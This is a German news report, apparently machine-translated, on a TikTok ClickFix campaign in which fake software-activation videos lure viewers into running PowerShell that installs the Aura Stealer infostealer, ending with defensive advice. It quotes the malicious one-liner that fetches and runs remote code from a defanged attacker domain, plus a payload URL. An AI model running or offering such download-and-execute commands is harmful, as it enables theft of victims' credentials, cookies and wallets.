Cyberkriminelle verbreiten auf TikTok Malware, die Informationen stiehlt, indem sie Videos verwenden, die als Anleitungen zur Aktivierung kostenloser Software getarnt sind. Entsprechend BleepingComputerISC-Handler Xavier Mertens identifizierte die laufende Kampagne, die eine Social-Engineering-Methode namens ClickFix-Angriff einsetzt, um Computersysteme zu infizieren. Die Videos, beobachtet von BleepingComputerbehaupten, Anweisungen zum Aktivieren legitimer Software wie Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro und Discord Nitro bereitzustellen. Die Kampagne wirbt auch für fiktive Dienste, darunter „Netflix Premium“ und „Spotify Premium“. Mertens stellte fest, dass diese Aktivität weitgehend mit einer Kampagne übereinstimmt, die das Sicherheitsunternehmen Trend Micro bereits im Mai beobachtet hatte. Die Videos verwenden eine Social-Engineering-Technik, die scheinbar gültige Lösungen oder Anweisungen präsentiert, um Benutzer dazu zu verleiten, ihre eigenen Maschinen zu kompromittieren. Dieser ClickFix-Angriff verleitet Benutzer dazu, bösartige PowerShell-Befehle auszuführen. In jedem Video wird ein einzeiliger Befehl angezeigt, z. B. „iex (irm slmgr[.]win/photoshop)` und weist die Betrachter an, es mit Administratorrechten auszuführen. Der Programmname in der URL wird so geändert, dass er mit der Software übereinstimmt, die imitiert wird. Ein gefälschter Windows-Leitfaden würde eine URL verwenden, die „Windows“ anstelle von „Photoshop“ enthält. Wenn der Befehl ausgeführt wird, stellt PowerShell eine Verbindung zur Remote-Site „slmgr“ her[.]win`, um ein weiteres PowerShell-Skript abzurufen und auszuführen. Dieses Skript lädt zwei ausführbare Dateien von Cloudflare-Seiten herunter. Die erste, von „https://file-epq[.]Seiten[.]dev/updater.exe ist eine Variante der Aura Stealer-Malware. Dieser Infostealer ist darauf ausgelegt, gespeicherte Browser-Anmeldeinformationen, Authentifizierungscookies, Kryptowährungs-Wallet-Daten und andere Anwendungsanmeldeinformationen zu sammeln. Die gestohlenen Daten werden dann an die Angreifer hochgeladen und ermöglichen ihnen so Zugriff auf die Konten des Opfers. Im Rahmen des Angriffs wird auch eine zweite Nutzlast, „source.exe“, heruntergeladen. Laut Mertens kompiliert diese ausführbare Datei den Code mithilfe des in .NET integrierten Visual C#-Compilers („csc.exe“) selbst. Der resultierende Code wird anschließend direkt in den Speicher eingefügt und gestartet. Der konkrete Zweck dieser zusätzlichen Nutzlast bleibt unklar. Benutzer, die diese Schritte ausgeführt haben, sollten davon ausgehen, dass alle ihre Anmeldeinformationen gefährdet sind. Die empfohlene Vorgehensweise besteht darin, die Passwörter auf allen von ihnen genutzten Websites und Diensten sofort zurückzusetzen, um unbefugten Kontozugriff und weiteren Datendiebstahl zu verhindern. ClickFix-Angriffe sind im letzten Jahr immer beliebter geworden und werden zur Verbreitung verschiedener Malware-Stämme in Ransomware- und Kryptowährungsdiebstahlkampagnen eingesetzt. Als allgemeine Regel gilt, dass Benutzer niemals Text von einer Website kopieren und ihn in einem Betriebssystemdialogfeld ausführen sollten. Diese Empfehlung umfasst die Adressleiste des Datei-Explorers, die Eingabeaufforderung, PowerShell-Eingabeaufforderungen, das macOS-Terminal und Linux-Shells.
